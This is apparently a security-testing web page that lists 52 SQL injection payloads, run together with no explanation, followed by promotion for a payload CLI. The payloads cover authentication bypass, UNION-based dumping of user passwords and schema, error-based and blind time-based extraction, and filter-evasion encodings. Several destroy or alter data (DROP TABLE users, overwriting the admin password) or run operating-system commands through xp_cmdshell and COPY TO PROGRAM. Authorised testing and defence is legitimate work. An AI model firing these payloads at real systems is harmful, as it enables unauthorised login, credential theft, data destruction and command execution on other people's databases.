$loading...
SQL Injection payloads for testing authentication bypass, UNION-based, error-based, and blind injection. (52 payloads)
' OR '1'='1' OR '1'='1'--' OR '1'='1'/*admin'--' OR 1=1--' OR 1=1#') OR ('1'='1') OR ('1'='1'--' UNION SELECT 1,'admin','password'--' OR ''='' UNION SELECT NULL--' UNION SELECT NULL,NULL--' UNION SELECT NULL,NULL,NULL--' ORDER BY 1--' UNION SELECT username,password FROM users--' UNION SELECT table_name,NULL FROM information_schema.tables--' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--' UNION SELECT @@version,NULL--' UNION SELECT version(),NULL--' UNION SELECT @@servername,NULL--' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--' AND 1=CONVERT(int,(SELECT @@version))--' AND 1=CAST((SELECT version()) AS int)--' || (SELECT '' FROM dual) || '' AND 1=1--' AND 1=2--' AND SUBSTRING(@@version,1,1)='5'--' AND (SELECT COUNT(*) FROM users)>0--' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--' AND LENGTH((SELECT database()))>5--' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--' AND SLEEP(5)--'; WAITFOR DELAY '0:0:5'--' AND pg_sleep(5)--' AND IF(1=1,SLEEP(5),0)--'; IF (1=1) WAITFOR DELAY '0:0:5'--' AND (CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--' OR BENCHMARK(10000000,SHA1('test'))--'; DROP TABLE users--'; INSERT INTO users VALUES('hacker','hacked')--'; UPDATE users SET password='hacked' WHERE username='admin'--'; EXEC xp_cmdshell('whoami')--'; COPY (SELECT '') TO PROGRAM 'id'--' /*!UNION*/ /*!SELECT*/ 1,2,3--' %55NION %53ELECT 1,2,3--' uNiOn SeLeCt 1,2,3--' UNION%0ASELECT%0A1,2,3--' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--'/**/UNION/**/SELECT/**/1,2,3--' AND 1=(SELECT 1 FROM dual WHERE 1=1)--Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides